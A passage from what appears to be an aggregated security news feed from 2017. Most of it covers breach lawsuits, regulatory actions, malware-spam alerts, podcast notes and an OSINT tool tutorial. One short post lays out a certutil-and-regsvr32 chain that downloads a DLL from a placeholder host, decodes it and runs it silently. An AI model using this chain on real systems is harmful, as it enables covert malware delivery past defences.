Failure to State a Claim. The appellate court found that “representations of [information security] conditions Scottrade will maintain are in the nature of contract recitals, and there was no alleged misrepresentation.” The court also faulted the plaintiff for not identifying any step Scottrade might have taken to protect his PII, or any applicable law or regulation to which Scottrade did not adhere. The plaintiff’s “implied premise that because data was hacked Scottrade’s protections must have been inadequate” was a naked assertion “that cannot survive a motion to dismiss.” The court stated, “[m]assive class action litigation should be based on more than allegations of worry and inconvenience.”

The court further found the plaintiff failed to plausibly allege actual damages. Because the Brokerage Agreement provided for charges based “on a per order basis,” any alleged information security failure that supposedly diminished the benefit of the plaintiff’s bargain was not plausible. The court identified additional reasons to affirm dismissal of the remainder of the claims.

Startup Security Weekly #52 – Security Startups Taste So Good

Michael and Paul discuss de-risking risk. In the news, ten tools to streamline your processes, why cash conversion matters, creating psychological safety, and updates from Cisco, Nationwide, and more on this episode of Startup Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode52

Visit https://www.securityweekly.com for all the latest episodes!

NIAC Issues Recommendations to Improve Critical Infrastructure Cybersecurity

On August 22, 2017, the National Infrastructure Advisory Council (“NIAC”) issued a report entitled Securing Cyber Assets: Addressing Urgent Cyber Threats to Critical Infrastructure (“NIAC Report”). NIAC was first created in 2001, shortly after the 9/11 attacks, and advises the President on information security systems in banking, finance, transportation, energy, manufacturing and emergency government services. The NIAC Report notes that sophisticated and readily available malicious cyber tools and exploits have lowered the barrier to entry and increased the potential for successful cyber attacks. According to the NIAC Report, “[t]here is a narrow and fleeting window of opportunity before a watershed, 9/11-level cyber attack to organize effectively and take bold action.”

The NIAC Report calls on the Trump Administration to take “bold, decisive actions” to improve critical infrastructure cybersecurity, including (1) establishing separate and secure communications networks for critical cyber networks; (2) facilitating a private-sector-led pilot of machine-to-machine information sharing technologies; (3) identifying best-in-class scanning tools and assessment practices; (4) strengthening the cyber workforce; (5) establishing outcome-based market incentives to encourage upgrades to cyber infrastructure; (6) streamlining security clearance processes for owners of critical cyber assets; (7) establishing protocols to rapidly declassify and proactively share cyber threat information; (8) creating a private-public task force of cyber experts; (9) leveraging GridEx IV Exercises to test cyber incident response; and (10) establishing an optimum cybersecurity governance approach.

The NIAC Report further recommends that the National Security Advisor be tasked with reviewing the report and, within 6 months, recommend immediate steps forward. Relatedly, President Trump’s recent E.O. 13800 directs the government to engage with such critical infrastructure to identify authorities and capabilities that agencies could employ to support the cybersecurity efforts of critical infrastructure entities, and issue a report to the President by November 2017.

Cyber Chef

Nice site at https://gchq.github.io/CyberChef/. It allows you to do all sorts of data format conversions, generate encodings and encryption, parse network data, extract strings, IPs and email addresses, analyze hashes, and a lot more.
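As a rough flavor of the one-off transforms it replaces, here is a Python stand-in (not CyberChef itself) that decodes Base64 and then extracts IPs and email addresses:

    # Decode Base64, then pull out IP addresses and emails, CyberChef-style.
    import base64
    import re

    blob = base64.b64decode("Y29udGFjdCBhZG1pbkBleGFtcGxlLmNvbSBhdCAxMC4wLjAuNQ==").decode()
    print(blob)                                              # contact admin@example.com at 10.0.0.5
    print(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", blob))  # ['10.0.0.5']
    print(re.findall(r"[\w.+-]+@[\w-]+\.[\w.]+", blob))      # ['admin@example.com']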

APEC and EU Discuss Interoperability Between Data Transfer Mechanisms

On August 24, 2017, APEC issued a statement on the renewed talks between APEC and the EU on creating interoperability between the APEC Cross-Border Privacy Rules (“CBPR”) and the EU data transfer mechanisms.

The APEC Data Privacy Subgroup (“DPS”) met with a representative of the European Commission on August 22, 2017 in Ho Chi Minh City, Vietnam, as part of the bi-annual meetings of the APEC DPS to discuss possible next steps in creating interoperability, particularly in light of the EU General Data Protection Regulation (“GDPR”) and its transfer mechanisms, including GDPR certifications and codes of conduct.

The August 22 meeting picked up where an earlier working group between the DPS and the EU’s Article 29 Working Party left off three years ago after it had developed a document (the “Referential”) comparing the requirements of the CBPR and the EU Binding Corporate Rules and taken initial steps to develop ways to streamline dual certifications under both systems. The aim of the meeting in Vietnam earlier this week was to explore ways to continue this work in light of the opportunities presented by the GDPR and the increasing interest among governments, regulators and industry in this work. The revived APEC/EU working group agreed to continue their discussions intersessionally between now and the next round of APEC privacy meetings in Papua New Guinea in early February 2018.

The EU Commission representative also attended the other meetings of the APEC DPS, where the principal focus remained on the ongoing implementation of the APEC CBPR system across the Asia-Pacific region, and on efforts to further enhance the infrastructure and governance framework needed to accommodate the growing number of APEC economies that are joining the CBPR system.

Mitmproxy Google Summer of Code 17 Summary

Hi, I’m Matthew Shao from China. This year, I had the honor of being selected as a Google Summer of Code student for the mitmproxy project. With the help of my kind mentors Maximilian Hils and Clemens Brunner, I managed to improve the source code of mitmweb, the web interface for mitmproxy, and added some exciting new features. Here I’m going to present the work I’ve done during this fulfilling summer.


Malware spam: "Voicemail Service" / "New voice message.."

The jumble of numbers in this spam is a bit confusing. Attached is a malicious RAR file that leads to Locky ransomware.

Subject:    New voice message 18538124076 in mailbox 185381240761 from "18538124076" <6641063681>
From:       "Voicemail Service" [vmservice@victimdomain.tdl]
Date:       Fri, August 25, 2017 12:36 pm

Dear user: just wanted to let you know you were just left a 0:13 long

Mentoring: On Blogging

Received the question about blogging. More specifically:
  • How and Why
  • How to benefit from blogging
  • How to be consistent with posting
In my mind, the key to success in blogging is to be totally selfish in its planning and execution.

Blogging is a personal activity/journey that you allow the public to be a part of. What I mean by this is that the main audience for your blog should be YOU. My blog is a place where I take notes and occasionally try to talk about more touchy-feely topics or issues. These notes are notes that I'm ok with sharing publicly. I also keep a private blog (really more of a notes/cheat-sheet setup, think RTFM; I use MDwiki) because you don't need to give everyone all your tricks and secrets. If you show up for a new job and everyone knows your tricks because you've shared them publicly (because you need attention from strangers), what value are you bringing to your employer?

The benefit to blogging is note taking. I'm a HUGE proponent of taking notes and I'd chalk a lot of my success up to taking copious notes.  When I figure out how to mess with technology X, I take notes on it. As a consultant, it may be months or years before I see it again.  Having notes to go back to saves time and stress.  It also allows me to help people on my team in the event they run into it while I am on a different project.

How/Platforms: I use Blogger because I don't want to secure/worry about my blogging platform. This blog was on Drupal for a bit, and some jerk decided to publicly make an example of the blog's lack of updates at BlackHat (appreciate the heads up... #totallynotbitter). With Blogger, hosted WordPress, or some other hosted platform, I'm offloading the risk and I don't have to worry about keeping up with patches.

Consistently posting: no idea. It's clear I have lost the ability to post consistently. I do sometimes queue up a bunch of posts and schedule their posting. I found it easier to find things to blog about when I was consulting, since I had a different client every week, so it would be difficult to tie a vulnerability back to any particular client. Now that I work for a company, if I'm talking about some vulnerability or exploit I used, there is a good chance I used it for work, potentially exposing the company to risk.

Length.  No one reads long posts.  Break long posts into separate logical posts even if you choose to post them at the same time.


Also see the "On Social Media" post (Todo)

Also
https://www.j4vv4d.com/a-blog-about-blogging-with-bloggers/

Also see this timely tweet by Robin Wood
https://twitter.com/digininja/status/900340713669279745

Malware spam: "Your Sage subscription invoice is ready" / noreply@sagetop.com

This fake Sage invoice leads to Locky ransomware. Quite why Sage are picked on so much by the bad guys is a bit of a mystery.

Subject:    Your Sage subscription invoice is ready
From:       "noreply@sagetop.com" [noreply@sagetop.com]
Date:       Thu, August 24, 2017 8:49 pm

Dear Customer

Your Sage subscription invoice is now ready to view.

Sage subscriptions

To view your Sage subscription

SEC Risk Alert Highlights Cybersecurity Improvements and Suggested Best Practices

On August 7, 2017, the Securities and Exchange Commission (“SEC”) Office of Compliance Inspections and Examinations (“OCIE”) issued a Risk Alert examining the cybersecurity policies and procedures of 75 broker-dealers, investment advisers and investment companies (collectively, the “firms”). The Risk Alert builds on OCIE’s 2014 Cybersecurity Initiative, a prior cybersecurity examination of the firms, and notes that while OCIE “observed increased cybersecurity preparedness” among the firms since 2014, it “also observed areas where compliance and oversight could be improved.”

Key improvements observed included:

  • use of periodic risk assessments, penetration tests and vulnerability scans of critical systems to identify cybersecurity threats and vulnerabilities, as well as potential business consequences of a cybersecurity incident;
  • procedures for regular system maintenance, including software patching, to address security updates;
  • implementation of written policies and procedures, including response plans and defined roles and responsibilities, for addressing cybersecurity incidents; and
  • vendor risk assessments conducted at the outset of an engagement with a vendor and often updated periodically throughout the business relationship.

Key issues observed included:

  • failure to reasonably tailor written policies and procedures (e.g., many policies and procedures were written vaguely or broadly, with limited examples of safeguards and limited procedures for policy implementation);
  • failure to adhere to or enforce written policies and procedures, or failure to ensure that such policies and procedures reflected firms’ actual practices;
  • failure to timely remediate high-risk findings of penetration tests and vulnerability scans; and
  • use of outdated operating systems that were no longer supported by security patches.

In addition, the Risk Alert included a list of best practices identified by OCIE as elements of robust cybersecurity programs. These included maintaining:

  • an inventory of data, information and vendors;
  • instructions for various aspects of cybersecurity protocols, including security monitoring, auditing and testing, as well as incident reporting;
  • schedules and processes for cybersecurity testing; and
  • “established and enforced” access controls to data and systems.

OCIE further noted that robust cybersecurity programs may include mandatory employee training and vetting and approval of policies and procedures by senior management. OCIE indicated in the Risk Alert that its list of cybersecurity program best practices is not intended to be exhaustive.

OCIE noted that it will continue to prioritize cybersecurity compliance and will examine firms’ procedures and controls, “including testing the implementation of those procedures and controls at firms.”

Multiple badness on metoristrontgui.info / 119.28.100.249

Two massive fake "Bill" spam runs seem to be under way, one claiming to be from BT and the other being more generic.

Subject: New BT Bill
From: "BT Business" [btbusiness@bttconnect.com]
Date: Thu, August 24, 2017 6:08 pm
Priority: Normal

From BT
New BT Bill
Your bill amount is: $106.84
This doesn't include any amounts brought forward from any other bills.
We've put your latest …

Enterprise Security Weekly #58 – A Game Changer

Paul and John discuss developer awareness, security training, and vulnerability tracking and reporting. In the news, diving deep into threat intelligence, GeoGuard and Skyhook team up, securing mobile devices, and more on this episode of Enterprise Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/ES_Episode58

Visit https://www.securityweekly.com for all the latest episodes!

Malware spam: "Customer Service" / "Copy of Invoice xxxx"

This fairly generic spam leads to the Locky ransomware:

Subject: Copy of Invoice 3206
From: "Customer Service"
Date: Wed, August 23, 2017 9:12 pm

Please download file containing your order information.
If you have any further questions regarding your invoice, please call Customer Service.
Please do not reply directly to this automatically generated e-mail message.
Thank …

MS16-149 – Important: Security Update for Microsoft Windows (3205655) – Version: 1.1

Severity Rating: Important
Revision Note: V1.1 (August 23, 2017): Corrected the Updates Replaced for security update 3196726 to None. This is an informational change only. Customers who have already successfully installed the update do not need to take any further action.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow elevation of privilege if a locally authenticated attacker runs a specially crafted application.

Malware spam: "Voice Message Attached from 0xxxxxxxxxxx – name unavailable"

This fake voice mail message leads to malware. It comes in two slightly different versions, one with a RAR file download and the other with a ZIP.

Subject: Voice Message Attached from 001396445685 - name unavailable
From: "Voice Message"
Date: Wed, August 23, 2017 10:22 am
Time: Wed, 23 Aug 2017 14:52:12 +0530

Download …

Hack Naked News #137 – August 22, 2017

Zero-days in PDF readers, updates to Debian Stretch, killer robots are coming, and more. Jason Wood of Paladin Security discusses sexually charged sonar-based attacks on this episode of Hack Naked News!

Full Show Notes: https://wiki.securityweekly.com/HNNEpisode137

Visit https://www.securityweekly.com for all the latest episodes!

Malware spam from "Voicemail Service" [pbx@local]

This fake voicemail leads to malware:

Subject: [PBX]: New message 46 in mailbox 461 from "460GOFEDEX" <8476446077>
From: "Voicemail Service" [pbx@local]
Date: Tue, August 22, 2017 10:37 am
To: "Evelyn Medina"
Priority: Normal

Dear user:
just wanted to let you know you were just left a 0:53 long message (number 46) in mailbox 461 from "460GOFEDEX" < …

Delaware Amends Data Breach Notification Law

As reported in BNA Privacy Law Watch, on August 17, 2017, Delaware amended its data breach notification law, effective April 14, 2018. The Delaware law previously required companies to give notice of a breach to affected Delaware residents “as soon as possible” after determining that, as a result of the breach, “misuse of information about a Delaware resident has occurred or is reasonably likely to occur.” The prior version of the law did not require regulator notification.

The amendments include several key provisions:

  • Definition of Personal Information. Under the revised law, the definition of “personal information” is expanded and now includes a Delaware resident’s first name or first initial and last name in combination with any one or more of the following data elements: (1) Social Security number; (2) driver’s license or state or federal identification card number; (3) account number, credit card number or debit card number in combination with any required security code, access code or password that would permit access to a financial account; (4) passport number; (5) a username or email address in combination with a password or security question and answer that would permit access to an online account; (6) medical history, treatment or diagnosis by a health care professional, or DNA profile; (7) health insurance identification number; (8) biometric data; and (9) an individual taxpayer identification number.
  • Timing. Companies will be required to notify affected individuals of a data breach within 60 days.
  • Notice to the Attorney General. Companies will be required to notify the Delaware Attorney General if a breach affects more than 500 Delaware residents.
  • Harm Threshold. The amendments change the law’s harm threshold for notification. Under the revised law, notification to affected individuals (and the Attorney General, if applicable) is required unless, after an appropriate investigation, the company reasonably determines that the breach is unlikely to result in harm to affected individuals.
  • Credit Monitoring. Companies will be required to offer credit monitoring services to affected individuals at no cost for one year if the breach includes a Delaware resident’s Social Security number. California’s breach notification law contains a similar requirement.

Uber Settles FTC Data Privacy and Security Allegations

On August 15, 2017, the FTC announced that it had reached a settlement with Uber, Inc., over allegations that the ride-sharing company had made deceptive data privacy and security representations to its consumers. Under the terms of the settlement, Uber has agreed to implement a comprehensive privacy program and undergo regular, independent privacy audits for the next 20 years.

The FTC’s complaint alleged that Uber made false or misleading representations that the company (1) appropriately controlled employee access to consumers’ personal information and (2) provided reasonable security for consumers’ personal information.

Employee Access to Consumers’ Personal Information

The complaint cited news reports from November 2014 that accused Uber employees of improperly accessing and using consumer personal information, including the use of an internal tracking tool called “God View,” which allowed employees to access the geolocation of individual Uber riders in real time. In its response to these allegations, Uber represented that the company had a “strict policy prohibiting all employees at every level from accessing a rider or driver’s data” except for a “limited set of legitimate business purposes.” Uber also stated that employee access to riders’ personal information was “closely monitored and audited by data security specialists on an ongoing basis.” The FTC alleged that (1) these statements were false or misleading, (2) Uber failed to implement a system that effectively and continuously monitored employee access, and (3) Uber did not respond in a timely fashion when alerted of the potential misuse of consumer personal information.

Data Security Representations

The complaint further alleged that Uber made the following false or misleading representations about the security of riders’ personal information:

  • From at least July 2013 to July 2015, Uber’s privacy policy represented that riders’ personal information was “securely stored within our databases” and that the company used “standard, industry-wide, commercially reasonable security practices such as encryption, firewalls and SSL…for protecting [rider] information.”
  • Uber customer service representatives assured riders that the company:
    • used “the most up to date technology and services” to protect personal information;
    • was “extra vigilant in protecting all private and personal information”; and
    • kept personal information “secure and encrypted to the highest security standards available.”

The FTC alleged that, in reality, Uber engaged in practices that failed to provide reasonable security to prevent unauthorized access to Uber riders’ and drivers’ personal information by, among other things:

  • failing to implement appropriate administrative access controls and multi-factor authentication on the company’s third-party databases that stored personal information;
  • failing to implement reasonable security training and guidance for employees;
  • failing to have a written information security program in place; and
  • storing sensitive personal information in a third-party storage database in clear, readable text, rather than encrypting the information.

The FTC alleged that these failures resulted in a May 2014 data breach of consumers’ personal information stored in a third-party database. The complaint alleged that the breach was caused by an intruder who used an access key that an Uber engineer had publicly posted to GitHub, a code-sharing website used by software developers.

Under the terms of the settlement agreement, Uber is:

  • prohibited from misrepresenting how it monitors internal access to consumers’ personal information;
  • prohibited from misrepresenting how it protects and secures that data;
  • required to implement a comprehensive privacy program that addresses privacy risks related to new and existing products and services, and protects the privacy and confidentiality of personal information collected by the company; and
  • required to obtain within 180 days of the settlement, and every two years after that for the next 20 years, independent, third-party audits certifying that it has a privacy program in place that meets or exceeds the requirements of the FTC order.

Uber’s settlement agreement underscores the importance of having accurate data privacy and security representations that are consistently followed by all company employees.

Certutil for delivery of files

Quick post putting together some twitter awesomeness

references:
https://twitter.com/subtee/status/888125678872399873
https://twitter.com/subTee/status/888071631528235010
https://twitter.com/malwaretechblog/status/733651527827623936

Let's do it

1. Create your DLL
2. Base64-encode it (optional)
3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down
4. Base64-decode the file with certutil
5. Execute the DLL with regsvr32: regsvr32 /s /u mydll.dll
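
Put together as one end-to-end command sequence, it looks something like the sketch below. This is a minimal illustration: the host name and the file names (payload.dll, file.txt, file.blah, mydll.dll) are placeholders.

:: On your own machine: base64-encode the DLL before hosting it (optional)
certutil -encode payload.dll file.txt

:: On the target: fetch the hosted file via certutil's URL cache
certutil.exe -urlcache -split -f http://example/file.txt file.blah

:: Decode it back into a DLL
certutil -decode file.blah mydll.dll

:: Execute the DLL silently via its DllUnregisterServer entry point
regsvr32 /s /u mydll.dll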


Cerber spam: "please print", "images etc"

I only have a couple of samples of this spam, but I suspect it comes in many different flavours…

Subject: images
From: "Sophia Passmore" [Sophia5555@victimdomain.tld]
Date: Fri, May 12, 2017 7:18 pm
--
*Sophia Passmore*

Subject: please print
From: "Roberta Pethick" [Roberta5555@victimdomain.tld]
Date: Fri, May 12, 2017 7:18 pm
--
*Roberta Pethick*

In these two …

IoT device guidelines

On several occasions I’ve written about insecurities of the Internet of Things – such as here, here, here, here and here. Recently, four US Senators decided to do something about it, and with the help of the Atlantic Council and Harvard University, have drafted a bill outlining minimum security requirements for IoT device purchases by …

FTC Posts Fifth Blog in Its “Stick with Security” Series

On August 18, 2017, the FTC published the fifth blog post in its “Stick with Security” series. As we previously reported, the FTC will publish an entry every Friday for the next few months focusing on each of the 10 principles outlined in its Start with Security Guide for Businesses. This week’s post, entitled Stick with Security: Store sensitive personal information securely and protect it during transmission, outlines steps businesses can take to secure sensitive data, including when it is in transit.

The FTC’s reasonable protections include:

  • Keeping Sensitive Information Secure Throughout its Lifecycle: This involves knowing how sensitive data enters the business, moves within it and leaves the business. Once a business understands this roadmap, it is easier to implement security at every interval of data movement.
  • Use Industry-Tested and Accepted Methods: To ensure security, businesses should adopt industry-tested methods reflective of expert wisdom in the field. For example, a business that adopts tried and true encryption methods accepted by industry, and incorporates these methods into product development, acts more prudently than a business that uses its own proprietary method to obfuscate data.
  • Ensure Proper Configuration: When businesses choose to use strong encryption, they need to ensure they have configured it correctly. For example, a business using Transport Layer Security (“TLS”) must ensure the process to validate the TLS certificate is enabled. Following default recommendations likely will result in the correct setup, but businesses that change settings must verify that the configuration is still correct (see the short sketch after this list).
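
To make the TLS point concrete, here is a minimal command-line sketch of what "validation enabled" means in practice. The badssl.com hosts are public test endpoints used purely for illustration, and the error output is abridged:

# With validation on (curl's default), a bad certificate is rejected:
curl https://expired.badssl.com/
# curl: (60) SSL certificate problem: certificate has expired

# Disabling validation (-k / --insecure) silently accepts the bad certificate,
# which is exactly the kind of misconfiguration the FTC warns against:
curl -k https://expired.badssl.com/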

The FTC’s next blog post, to be published on Friday, August 25, will focus on segmenting networks and monitoring who is trying to get in and out.

To read our previous posts documenting the series, see FTC Posts Fourth Blog in its “Stick with Security” Series, FTC Posts Third Blog in its “Stick with Security” Series and FTC Posts Second Blog in its “Stick with Security” Series.

Google Begins Campaign Warning Forms Not Using HTTPS Protocol

In August 2014, Google released an article sharing their thoughts on how they planned to focus on their “HTTPS everywhere” campaign (originally initiated at their Google I/O event). The premise of...


The post Google Begins Campaign Warning Forms Not Using HTTPS Protocol appeared first on PerezBox.

SEC Warns Initial Coin Offerings May Be Subject to U.S. Federal Securities Laws

In 2017, over $1.3 billion has been raised by start-ups through Initial Coin Offerings (“ICOs”), a relatively new form of financing technique in which a company (typically one operating in the digital currency space) seeking to raise seed money makes a “token” available for sale, and the token gives the purchaser some future right in the business or other benefit. Amidst much anticipation, on July 25, 2017, the Securities and Exchange Commission (“SEC”) released a Report of Investigation (“Report”) under Section 21(a) of the Securities Exchange Act of 1934 warning the market that “tokens” issued in ICOs may be “securities” such that the full breadth of the U.S. federal securities laws may apply to their offer and sale. The Report and a simultaneously released Investor Bulletin offer guidance and serve as a notice to the market that the SEC will be policing this new financing technique.

Read the full client alert.

Russian Privacy Regulator Adds Countries to List of Nations with Sufficient Privacy Protections

As reported in BNA Privacy & Security Law Report, on August 9, 2017, the Russian privacy regulator, Roskomnadzor, expanded its list of nations that provide sufficient privacy protections to allow transfers of personal data from Russia. Russian law allows data transfers to countries that are signatories to the Council of Europe’s Convention for the Protection of Individuals with regard to Automatic Processing of Personal Data (the “Convention”), and to certain other non-signatory countries deemed by Roskomnadzor to have adequate privacy protections based on relevant data protection laws, privacy regulators and penalties for privacy law violations.

The new authorized countries are Costa Rica, Gabon, Kazakhstan, Mali, Qatar, South Africa and Singapore. They join Angola, Argentina, Benin, Canada, Cape Verde, Chile, Israel, Malaysia, Mexico, Mongolia, Morocco, New Zealand, Peru, South Korea and Tunisia. The United States is neither a signatory to the Convention nor on Roskomnadzor’s list of countries with adequate privacy protections to permit personal data transfers from Russia.

Hack Naked News #136 – August 15, 2017

Allowing terrible passwords, four arrested in Game of Thrones leak, using EternalBlue to attack hotel guests, and more. Don Pezet of ITProTV joins us to deliver expert commentary on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode136Visit https://www.securityweekly.com for all the latest episodes!

Toolsmith #127: OSINT with Datasploit

I was reading an interesting Motherboard article, Legal Hacking Tools Can Be Useful for Journalists, Too, that includes a reference to one of my all-time OSINT favorites, Maltego. Joseph Cox's article also mentions Datasploit, a 2016 favorite of fellow tools aficionado Toolswatch.org; see 2016 Top Security Tools as Voted by ToolsWatch.org Readers. Having not yet explored Datasploit myself, I took this as a grand case of "no time like the present."
Datasploit is "an #OSINT Framework to perform various recon techniques, aggregate all the raw data, and give data in multiple formats." More specifically, as stated on Datasploit documentation page under Why Datasploit, it utilizes various Open Source Intelligence (OSINT) tools and techniques found to be effective, and brings them together to correlate the raw data captured, providing the user relevant information about domains, email address, phone numbers, person data, etc. Datasploit is useful to collect relevant information about target in order to expand your attack and defense surface very quickly.
The feature list includes:
  • Automated OSINT on domain / email / username / phone for relevant information from different sources
  • Useful for penetration testers, cyber investigators, defensive security professionals, etc.
  • Correlates and collates results, showing them in a consolidated manner
  • Tries to find out credentials, API keys, tokens, sub-domains, domain history, legacy portals, and more as related to the target
  • Available as a single consolidated tool as well as standalone scripts
  • Performs Active Scans on collected data
  • Generates HTML, JSON reports along with text files
Resources
Github: https://github.com/datasploit/datasploit
Documentation: http://datasploit.readthedocs.io/en/latest/
YouTube: Quick guide to installation and use

Pointers
A few pointers to keep you from losing your mind. This project is very much a work in progress, with lots of frustrated users filing bugs and wondering where the support is. The team is doing their best; be patient with them, but read through the Github issues to be sure any bugs you run into haven't already been addressed.
1) Datasploit does not fail gracefully; it just crashes. This can be the result of unmet dependencies or even a missing API key. Do not despair; take note, and I'll talk you through it.
2) For ease, and the best match to the documentation, I suggest running Datasploit from an Ubuntu variant. Your best bet is to grab Kali (VM or dedicated) and load it up there, as I did.
3) My installation guidance and recommendations should get you running trouble-free; follow them explicitly.
4) Acquire as many API keys as possible; see further detail below.

Installation and preparation
From Kali bash prompt, in this order:

  1. git clone https://github.com/datasploit/datasploit /etc/datasploit
  2. apt-get install libxml2-dev libxslt-dev python-dev lib32z1-dev zlib1g-dev
  3. cd /etc/datasploit
  4. pip install -r requirements.txt
  5. mv config_sample.py config.py
  6. With your preferred editor, open config.py and add API keys for the following at a minimum. They are, for all intents and purposes, required; detailed instructions to acquire each are here:
    1. Shodan API
    2. Censysio ID and Secret
    3. Clearbit API
    4. Emailhunter API
    5. Fullcontact API
    6. Google Custom Search Engine API key and CX ID
    7. Zoomeye Username and Password
If, and only if, you've done all of this correctly, you might end up with a running instance of Datasploit. :-) Seriously, this is some of the glitchiest software I've tussled with in quite a while, but the results paid handsomely. Run python datasploit.py domain.com, where domain.com is your target. Obviously, I ran python datasploit.py holisticinfosec.org to acquire results pertinent to your author. 
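For reference, the two invocation styles used in this post, consolidated (run from the /etc/datasploit directory; the targets are simply the examples used here):

# Full OSINT run against a domain
python datasploit.py holisticinfosec.org

# Call an individual module standalone, e.g. email OSINT
python emailOsint.py russ@holisticinfosec.org
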
Datasploit rapidly pulled results as follows:

  • 211 domain references from Github
  • Luckily, no results from Shodan :-)
  • Four results from Paste(s), covering Pastebin and Pastie
  • russ at holisticinfosec dot org, as expected, per email harvesting
  • Accurate HolisticInfoSec host location data from Zoomeye
  • Details regarding HolisticInfoSec sub-domains and page links
  • Finally, a good return on DNS records for holisticinfosec.org and, thankfully, no vulns found via PunkSpider

DataSploit can also be integrated into other code and called as individual scripts for unique functions. I did a quick run with python emailOsint.py russ@holisticinfosec.org and the results were impressive.
I love that the first query is of Troy Hunt's Have I Been Pwned. Not sure if you have been? Better check it out. A reminder here: you'll really want as many API keys as possible, or you may find these buggy scripts crashing. You'll definitely find yourself weighing the frustration against the rapid, detailed results. I put this offering squarely in the "shows much promise" category, provided the devs keep focus on it, assess for quality, and handle errors better.
Give Datasploit a try for sure.
Cheers, until next time...

Detect and Prevent Data Exfiltration Webinar with Infoblox

Please join SANS Institute Instructor and LEO Cyber Security Co-Founder & CTO Andrew Hay and Infoblox Security Product Marketing’s Sam Kumarsamy on Thursday, August 17th, 2017 at 1:00 PM EDT (17:00:00 UTC) as they present a SANS Institute webinar entitled Detect & Prevent Data Exfiltration: A Unique Approach.

Overview

Data is the new currency in the modern digital enterprise, and protecting data is a strategic imperative for every organization. Enterprises must protect data whether it resides in a data center, on an individual's laptop used on or off premises, or across the globally distributed enterprise. Effective data exfiltration prevention requires protecting DNS, one of the most commonly used channels for stealing data, and combining reputation, signatures and behavioral analytics. Detecting and preventing data loss requires analyzing vast amounts of network data, and requires a solution that can scale to examine this data. In this webinar you will also learn about Infoblox's unique approach to detecting and preventing data exfiltration.

To register for the webinar, please visit: https://www.sans.org/webcasts/detect-prevent-data-exfiltration-unique-approach-infoblox-104985

You can now also attend the webcast using your mobile device!

 

The post Detect and Prevent Data Exfiltration Webinar with Infoblox appeared first on LEO Cyber Security.

Hunton Privacy Team Publishes Several Chapters in International Comparative Legal Guide to Data Protection

Recently, the fourth edition of the book, The International Comparative Legal Guide to: Data Protection 2017, was published by the Global Legal Group. Hunton & Williams’ Global Privacy and Cybersecurity lawyers prepared several chapters in the guide, including the opening chapter on “All Change for Data Protection: The European Data Protection Regulation,” co-authored by London partner Bridget Treacy and associate Anita Bapat. Several other global privacy and cybersecurity team members also prepared chapters in the guide, including David Dumont (Belgium), Claire François (France), Judy Li (China), Manuel E. Maisog (China), Wim Nauwelaerts (Belgium), Anna Pateraki (Germany), Aaron P. Simpson (United States), Adam Smith (United Kingdom) and Jenna Rode (United States).

The guide provides corporate counsel and international practitioners with a comprehensive worldwide legal analysis of the laws and regulations relating to data protection. Aaron Simpson, managing partner of the firm’s London office, and Anita Bapat, senior associate in London, served as the contributing editors of the guide.

View the relevant chapters.

Samsung Knox 1.0 Remote Code Execution Vulnerability

Samsung Knox is prone to a remote code-execution vulnerability. A remote attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts may result in a denial-of-service condition.

The CERT Guide to Coordinated Vulnerability Disclosure

We are happy to announce the release of the CERT® Guide to Coordinated Vulnerability Disclosure (CVD). The guide provides an introduction to the key concepts, principles, and roles necessary to establish a successful CVD process. It also provides insights into how CVD can go awry and how to respond when it does so.

As a process, CVD is intended to minimize adversary advantage while an information security vulnerability is being mitigated. And it is important to recognize that CVD is a process, not an event. Releasing a patch or publishing a document are important events within the process, but do not define it.

CVD participants can be thought of as repeatedly asking these questions: What actions should I take in response to knowledge of this vulnerability in this product? Who else needs to know what, and when do they need to know it? The CVD process for a vulnerability ends when the answers to these questions are nothing, and no one.

If we have learned anything in nearly three decades of coordinating vulnerability reports at the CERT/CC, it is that there is no single right answer to many of the questions and controversies surrounding the disclosure of information about software and system vulnerabilities. The CERT Guide to CVD is a summary of what we know about a complex social process that surrounds humans trying to make the software and systems they use more secure. It's about what to do (and what not to) when you find a vulnerability, or when you find out about a vulnerability. It's written for vulnerability analysts, security researchers, developers, and deployers; it's for both technical staff and their management alike. While we discuss a variety of roles that play a part in the process, we intentionally chose not to focus on any one role; instead we wrote for any party that might find itself engaged in coordinating a vulnerability disclosure.

In a sense, this report is a travel guide for what might seem a foreign territory. Maybe you've passed through once or twice. Maybe you've only heard about the bad parts. You may be uncertain of what to do next, nervous about making a mistake, or even fearful of what might befall you. If you count yourself as one of those individuals, we want to reassure you that you are not alone; you are not the first to experience events like these or even your reaction to them. We're locals. We've been doing this for a while. Here's what we know.

Abstract

Security vulnerabilities remain a problem for vendors and deployers of software-based systems alike. Vendors play a key role by providing fixes for vulnerabilities, but they have no monopoly on the ability to discover vulnerabilities in their products and services. Knowledge of those vulnerabilities can increase adversarial advantage if deployers are left without recourse to remediate the risks they pose. Coordinated Vulnerability Disclosure (CVD) is the process of gathering information from vulnerability finders, coordinating the sharing of that information between relevant stakeholders, and disclosing the existence of software vulnerabilities and their mitigations to various stakeholders including the public. The CERT Coordination Center has been coordinating the disclosure of software vulnerabilities since its inception in 1988. This document is intended to serve as a guide to those who want to initiate, develop, or improve their own CVD capability. In it, the reader will find an overview of key principles underlying the CVD process, a survey of CVD stakeholders and their roles, and a description of CVD process phases, as well as advice concerning operational considerations and problems that may arise in the provision of CVD and related services.

The CERT® Guide to Coordinated Vulnerability Disclosure is available in the SEI Digital Library.

Colombia Designates U.S. as “Adequate” Data Transfer Nation

On August 14, 2017, the Colombian Superintendence of Industry and Commerce (“SIC”) announced that it was adding the United States to its list of nations that provide an adequate level of protection for the transfer of personal information, according to a report from Bloomberg BNA. The SIC, along with the Superintendence of Finance, is Colombia’s data protection authority, and is responsible for enforcing Colombia’s data protection law. Under Colombian law, transfers of personal information to countries that are deemed to have laws providing an adequate level of protection are subject to less stringent restrictions (for example, prior consent for certain international transfers of personal information may not be required if a country’s protections are deemed adequate). This development should help facilitate the transfer of personal information from Colombia to the United States.

FTC Posts Fourth Blog in Its “Stick with Security” Series

